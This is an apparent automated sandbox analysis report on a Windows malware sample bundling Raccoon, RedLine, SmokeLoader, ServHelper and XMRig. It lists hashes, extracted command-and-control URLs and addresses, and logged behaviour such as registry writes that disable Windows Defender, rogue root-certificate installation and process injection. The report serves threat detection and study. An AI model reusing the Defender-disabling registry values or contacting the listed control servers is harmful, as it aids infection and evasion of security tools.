raccoon | 897bb67dac34904d72e20fb6b62feb31c86575107563db56535c38d81eec56aa

Analysis

max time kernel
151s
max time network
116s
platform
windows10_x64
resource
win10-en-20210920
submitted
29-09-2021 03:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f8c9d11a8316183bc3c137f9e1d452c7.exe
Size

233KB
MD5

f8c9d11a8316183bc3c137f9e1d452c7
SHA1

a32a7b8ca21bc1da2ccd397e88fcb589b41a81e4
SHA256

897bb67dac34904d72e20fb6b62feb31c86575107563db56535c38d81eec56aa
SHA512

0e5435387b765b38f3f3198b1a1a13c66cecb791129becb7187a1b3bfa98d603b3923f92e8ff1bb26ca69151c1fcb9ea4c1ea0d95492f14d552861fcb8102ae8

Score

10^/10

raccoon redline servhelper smokeloader xmrig 5ff0ccb2bc00dc52d1ad09949e9c7663bc9ca4d4 777777 backdoor discovery evasion infostealer miner persistence spyware stealer trojan

Malware Config

Extracted

Family

smokeloader

Version

2020

http://naghenrietti1.top/

http://kimballiett2.top/

http://xadriettany3.top/

http://jebeccallis4.top/

http://nityanneron5.top/

http://umayaniela6.top/

http://lynettaram7.top/

http://sadineyalas8.top/

http://geenaldencia9.top/

http://aradysiusep10.top/

rc4.i32

Extracted

Family

redline

Botnet

777777

193.56.146.60:18243

Extracted

Family

raccoon

Botnet

5ff0ccb2bc00dc52d1ad09949e9c7663bc9ca4d4

Attributes

url4cnc
https://t.me/agrybirdsgamerept

rc4.plain

Signatures

Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 3 IoCs

resource	yara_rule
behavioral2/memory/3996-151-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral2/memory/3996-153-0x000000000041C5D2-mapping.dmp	family_redline
behavioral2/memory/3996-181-0x00000000052C0000-0x00000000058C6000-memory.dmp	family_redline

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Turns off Windows Defender SpyNet reporting 2 TTPs
evasion

Disabling Security Tools
T1089

Modify Registry
T1112
Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Nirsoft 3 IoCs

resource	yara_rule
behavioral2/files/0x000400000001abcd-132.dat	Nirsoft
behavioral2/files/0x000400000001abcd-133.dat	Nirsoft
behavioral2/files/0x000400000001abcd-135.dat	Nirsoft

Downloads MZ/PE file

Executes dropped EXE 10 IoCs

pid	Process
2756	F831.exe
2788	FB7E.exe
3428	AdvancedRun.exe
3556	AdvancedRun.exe
3660	FB7E.exe
3748	FB7E.exe
3996	FB7E.exe
2392	13C9.exe
3508	1F82.exe
4552	disksyncer.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Deletes itself 1 IoCs

pid	Process
3040	Process not Found

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\netoptimize.lnk	disksyncer.exe

Loads dropped DLL 18 IoCs

pid	Process
2392	13C9.exe
2392	13C9.exe
3660	MsiExec.exe
3660	MsiExec.exe
2860	MsiExec.exe
2860	MsiExec.exe
2860	MsiExec.exe
2860	MsiExec.exe
2860	MsiExec.exe
2860	MsiExec.exe
2392	13C9.exe
3508	1F82.exe
4552	disksyncer.exe
3508	1F82.exe
3508	1F82.exe
3508	1F82.exe
3508	1F82.exe
4552	disksyncer.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Windows security modification 2 TTPs 10 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\FB7E.exe = "0"	FB7E.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	FB7E.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0"	FB7E.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0"	FB7E.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	FB7E.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	FB7E.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths	FB7E.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions	FB7E.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection	FB7E.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet	FB7E.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\Q:	13C9.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\M:	13C9.exe
File opened (read-only)	\??\X:	13C9.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\N:	13C9.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\K:	13C9.exe
File opened (read-only)	\??\W:	13C9.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Z:	13C9.exe
File opened (read-only)	\??\L:	13C9.exe
File opened (read-only)	\??\O:	13C9.exe
File opened (read-only)	\??\Y:	13C9.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\A:	13C9.exe
File opened (read-only)	\??\B:	13C9.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\F:	13C9.exe
File opened (read-only)	\??\R:	13C9.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\H:	13C9.exe
File opened (read-only)	\??\T:	13C9.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\E:	13C9.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\P:	13C9.exe
File opened (read-only)	\??\S:	13C9.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\rdpclip.exe	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs

pid	Process
2788	FB7E.exe
2788	FB7E.exe
2788	FB7E.exe
2788	FB7E.exe
2788	FB7E.exe
2788	FB7E.exe
2788	FB7E.exe
2788	FB7E.exe
2788	FB7E.exe
2788	FB7E.exe
2788	FB7E.exe
2788	FB7E.exe
2788	FB7E.exe
2788	FB7E.exe
2788	FB7E.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2276 set thread context of 2844	2276	f8c9d11a8316183bc3c137f9e1d452c7.exe	70
PID 2788 set thread context of 3996	2788	FB7E.exe	81

Drops file in Windows directory 21 IoCs

description	ioc	Process
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\Installer\MSI36A5.tmp	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI46E4.tmp	msiexec.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\Installer\32c12.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI2DD7.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI33B5.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI353D.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\32c12.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI385C.tmp	msiexec.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\Installer\MSI3172.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\SourceHash{00CE1E75-E04C-4F83-824D-20B2297C955F}	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	f8c9d11a8316183bc3c137f9e1d452c7.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	f8c9d11a8316183bc3c137f9e1d452c7.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	f8c9d11a8316183bc3c137f9e1d452c7.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
4648	timeout.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
2692	reg.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	13C9.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	13C9.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	13C9.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	13C9.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2844	f8c9d11a8316183bc3c137f9e1d452c7.exe
2844	f8c9d11a8316183bc3c137f9e1d452c7.exe
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found
3040	Process not Found

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3040	Process not Found

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
632	Process not Found

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2844	f8c9d11a8316183bc3c137f9e1d452c7.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2788	FB7E.exe
Token: SeDebugPrivilege	3428	AdvancedRun.exe
Token: SeImpersonatePrivilege	3428	AdvancedRun.exe
Token: SeDebugPrivilege	3556	AdvancedRun.exe
Token: SeImpersonatePrivilege	3556	AdvancedRun.exe
Token: SeDebugPrivilege	3952	powershell.exe
Token: SeDebugPrivilege	2360	powershell.exe
Token: SeSecurityPrivilege	1552	msiexec.exe
Token: SeCreateTokenPrivilege	2392	13C9.exe
Token: SeAssignPrimaryTokenPrivilege	2392	13C9.exe
Token: SeLockMemoryPrivilege	2392	13C9.exe
Token: SeIncreaseQuotaPrivilege	2392	13C9.exe
Token: SeMachineAccountPrivilege	2392	13C9.exe
Token: SeTcbPrivilege	2392	13C9.exe
Token: SeSecurityPrivilege	2392	13C9.exe
Token: SeTakeOwnershipPrivilege	2392	13C9.exe
Token: SeLoadDriverPrivilege	2392	13C9.exe
Token: SeSystemProfilePrivilege	2392	13C9.exe
Token: SeSystemtimePrivilege	2392	13C9.exe
Token: SeProfSingleProcessPrivilege	2392	13C9.exe
Token: SeIncBasePriorityPrivilege	2392	13C9.exe
Token: SeCreatePagefilePrivilege	2392	13C9.exe
Token: SeCreatePermanentPrivilege	2392	13C9.exe
Token: SeBackupPrivilege	2392	13C9.exe
Token: SeRestorePrivilege	2392	13C9.exe
Token: SeShutdownPrivilege	2392	13C9.exe
Token: SeDebugPrivilege	2392	13C9.exe
Token: SeAuditPrivilege	2392	13C9.exe
Token: SeSystemEnvironmentPrivilege	2392	13C9.exe
Token: SeChangeNotifyPrivilege	2392	13C9.exe
Token: SeRemoteShutdownPrivilege	2392	13C9.exe
Token: SeUndockPrivilege	2392	13C9.exe
Token: SeSyncAgentPrivilege	2392	13C9.exe
Token: SeEnableDelegationPrivilege	2392	13C9.exe
Token: SeManageVolumePrivilege	2392	13C9.exe
Token: SeImpersonatePrivilege	2392	13C9.exe
Token: SeCreateGlobalPrivilege	2392	13C9.exe
Token: SeCreateTokenPrivilege	2392	13C9.exe
Token: SeAssignPrimaryTokenPrivilege	2392	13C9.exe
Token: SeLockMemoryPrivilege	2392	13C9.exe
Token: SeIncreaseQuotaPrivilege	2392	13C9.exe
Token: SeMachineAccountPrivilege	2392	13C9.exe
Token: SeTcbPrivilege	2392	13C9.exe
Token: SeSecurityPrivilege	2392	13C9.exe
Token: SeTakeOwnershipPrivilege	2392	13C9.exe
Token: SeLoadDriverPrivilege	2392	13C9.exe
Token: SeSystemProfilePrivilege	2392	13C9.exe
Token: SeSystemtimePrivilege	2392	13C9.exe
Token: SeProfSingleProcessPrivilege	2392	13C9.exe
Token: SeIncBasePriorityPrivilege	2392	13C9.exe
Token: SeCreatePagefilePrivilege	2392	13C9.exe
Token: SeCreatePermanentPrivilege	2392	13C9.exe
Token: SeBackupPrivilege	2392	13C9.exe
Token: SeRestorePrivilege	2392	13C9.exe
Token: SeShutdownPrivilege	2392	13C9.exe
Token: SeDebugPrivilege	2392	13C9.exe
Token: SeAuditPrivilege	2392	13C9.exe
Token: SeSystemEnvironmentPrivilege	2392	13C9.exe
Token: SeChangeNotifyPrivilege	2392	13C9.exe
Token: SeRemoteShutdownPrivilege	2392	13C9.exe
Token: SeUndockPrivilege	2392	13C9.exe
Token: SeSyncAgentPrivilege	2392	13C9.exe
Token: SeEnableDelegationPrivilege	2392	13C9.exe
Token: SeManageVolumePrivilege	2392	13C9.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
2900	msiexec.exe
2900	msiexec.exe
3040	Process not Found
3040	Process not Found

Suspicious use of SendNotifyMessage 2 IoCs

pid	Process
3040	Process not Found
3040	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2276 wrote to memory of 2844	2276	f8c9d11a8316183bc3c137f9e1d452c7.exe	70
PID 2276 wrote to memory of 2844	2276	f8c9d11a8316183bc3c137f9e1d452c7.exe	70
PID 2276 wrote to memory of 2844	2276	f8c9d11a8316183bc3c137f9e1d452c7.exe	70
PID 2276 wrote to memory of 2844	2276	f8c9d11a8316183bc3c137f9e1d452c7.exe	70
PID 2276 wrote to memory of 2844	2276	f8c9d11a8316183bc3c137f9e1d452c7.exe	70
PID 2276 wrote to memory of 2844	2276	f8c9d11a8316183bc3c137f9e1d452c7.exe	70
PID 3040 wrote to memory of 2756	3040	Process not Found	71
PID 3040 wrote to memory of 2756	3040	Process not Found	71
PID 3040 wrote to memory of 2756	3040	Process not Found	71
PID 3040 wrote to memory of 2788	3040	Process not Found	72
PID 3040 wrote to memory of 2788	3040	Process not Found	72
PID 3040 wrote to memory of 2788	3040	Process not Found	72
PID 2788 wrote to memory of 3428	2788	FB7E.exe	73
PID 2788 wrote to memory of 3428	2788	FB7E.exe	73
PID 2788 wrote to memory of 3428	2788	FB7E.exe	73
PID 3428 wrote to memory of 3556	3428	AdvancedRun.exe	74
PID 3428 wrote to memory of 3556	3428	AdvancedRun.exe	74
PID 3428 wrote to memory of 3556	3428	AdvancedRun.exe	74
PID 2788 wrote to memory of 3952	2788	FB7E.exe	77
PID 2788 wrote to memory of 3952	2788	FB7E.exe	77
PID 2788 wrote to memory of 3952	2788	FB7E.exe	77
PID 2788 wrote to memory of 3660	2788	FB7E.exe	79
PID 2788 wrote to memory of 3660	2788	FB7E.exe	79
PID 2788 wrote to memory of 3660	2788	FB7E.exe	79
PID 2788 wrote to memory of 3748	2788	FB7E.exe	80
PID 2788 wrote to memory of 3748	2788	FB7E.exe	80
PID 2788 wrote to memory of 3748	2788	FB7E.exe	80
PID 2788 wrote to memory of 3996	2788	FB7E.exe	81
PID 2788 wrote to memory of 3996	2788	FB7E.exe	81
PID 2788 wrote to memory of 3996	2788	FB7E.exe	81
PID 2788 wrote to memory of 3996	2788	FB7E.exe	81
PID 2788 wrote to memory of 3996	2788	FB7E.exe	81
PID 2788 wrote to memory of 3996	2788	FB7E.exe	81
PID 2788 wrote to memory of 3996	2788	FB7E.exe	81
PID 2788 wrote to memory of 3996	2788	FB7E.exe	81
PID 3040 wrote to memory of 2392	3040	Process not Found	83
PID 3040 wrote to memory of 2392	3040	Process not Found	83
PID 3040 wrote to memory of 2392	3040	Process not Found	83
PID 2756 wrote to memory of 2360	2756	F831.exe	84
PID 2756 wrote to memory of 2360	2756	F831.exe	84
PID 2756 wrote to memory of 2360	2756	F831.exe	84
PID 3040 wrote to memory of 3508	3040	Process not Found	87
